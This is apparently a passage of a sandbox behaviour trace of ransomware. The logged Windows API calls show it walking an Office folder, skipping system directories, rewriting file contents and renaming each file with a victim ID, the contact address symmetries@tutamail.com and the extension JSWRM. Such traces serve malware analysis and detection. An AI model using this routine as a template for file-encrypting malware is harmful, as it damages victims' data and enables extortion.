lpMultiByteStr="OUTLOOK_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0116.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0116.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.040] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0116.040] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_F_COL.HXK", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0116.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0116.041] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0116.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0116.041] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.041] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0116.041] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.041] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0116.041] ReadFile (in: hFile=0x238, lpBuffer=0x2092d8, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0116.042] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.042] WriteFile (in: hFile=0x238, lpBuffer=0x2092d8*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2092d8*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0116.042] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0116.042] CloseHandle (hObject=0x238) returned 1 [0116.042] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0116.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0116.043] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0116.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0116.043] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0116.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0116.043] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.043] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0116.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0116.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0116.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0116.044] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0116.044] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9c1bf71, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9c1bf71, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa284551, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLOOK_K_COL.HXK", cAlternateFileName="OUTLOO~1.HXK")) returned 1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2=".") returned 1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="..") returned 1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="...") returned 1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="windows") returned -1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="recovery") returned -1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="perflogs") returned -1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="documents and settings") returned 1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="system volume information") returned -1 [0116.044] lstrcmpiW (lpString1="OUTLOOK_K_COL.HXK", lpString2="msocache") returned 1 [0116.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0116.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.044] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0116.044] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0116.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0116.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0116.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0116.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLOOK_K_COL.HXK", cchWideChar=17, lpMultiByteStr=0x241218, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLOOK_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0116.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0116.045] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0116.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0116.045] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.045] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=113) returned 1 [0116.045] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.045] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0116.045] ReadFile (in: hFile=0x238, lpBuffer=0x209710, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0116.046] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.046] WriteFile (in: hFile=0x238, lpBuffer=0x209710*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209710*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0116.046] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0116.047] CloseHandle (hObject=0x238) returned 1 [0116.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0116.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0116.047] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0116.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0116.047] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0116.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0116.047] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.047] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLOOK_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlook_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0116.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0116.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0116.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0116.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0116.048] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca90ec5a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca90ec5a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca90ec5a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x227, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLPERF.H", cAlternateFileName="")) returned 1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2=".") returned 1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="..") returned 1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="...") returned 1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="windows") returned -1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="recovery") returned -1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="perflogs") returned -1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="documents and settings") returned 1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="$RECYCLE.BIN") returned 1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="system volume information") returned -1 [0116.048] lstrcmpiW (lpString1="OUTLPERF.H", lpString2="msocache") returned 1 [0116.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0116.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPERF.H", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPERF.H", cchWideChar=10, lpMultiByteStr=0x345ebd8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLPERF.H", lpUsedDefaultChar=0x0) returned 10 [0116.048] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0116.048] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0116.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPERF.H", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0116.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPERF.H", cchWideChar=10, lpMultiByteStr=0x345eba8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLPERF.H", lpUsedDefaultChar=0x0) returned 10 [0116.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0116.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0116.049] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0116.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0116.049] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0116.049] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0116.049] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLPERF.H" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlperf.h"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0116.051] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=551) returned 1 [0116.051] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.051] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x220) returned 0x209950 [0116.051] ReadFile (in: hFile=0x238, lpBuffer=0x209950, nNumberOfBytesToRead=0x220, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesRead=0x345e89c*=0x220, lpOverlapped=0x0) returned 1 [0116.052] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0116.052] WriteFile (in: hFile=0x238, lpBuffer=0x209950*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209950*, lpNumberOfBytesWritten=0x345e898*=0x220, lpOverlapped=0x0) returned 1 [0116.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209950 | out: hHeap=0x1e0000) returned 1 [0116.053] CloseHandle (hObject=0x238) returned 1 [0116.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0116.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0116.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0116.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0116.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0116.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0116.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0116.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0116.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0116.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0116.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0116.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0116.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0116.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0116.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0116.053] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0116.053] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLPERF.H" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlperf.h"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OUTLPERF.H.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\outlperf.h.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0116.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0116.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0116.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0116.061] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xca8e89fe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xca8e89fe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xca90ec5a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa87, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OUTLPERF.INI", cAlternateFileName="")) returned 1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2=".") returned 1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="..") returned 1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="...") returned 1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="windows") returned -1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="recovery") returned -1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="perflogs") returned -1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="documents and settings") returned 1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="$RECYCLE.BIN") returned 1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="system volume information") returned -1 [0116.061] lstrcmpiW (lpString1="OUTLPERF.INI", lpString2="msocache") returned 1 [0116.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0116.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPERF.INI", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPERF.INI", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLPERF.INI", lpUsedDefaultChar=0x0) returned 12 [0116.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0116.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0116.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPERF.INI", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTLPERF.INI", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTLPERF.INI", lpUsedDefaultChar=0x0) returned 12 [0116.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0116.061] 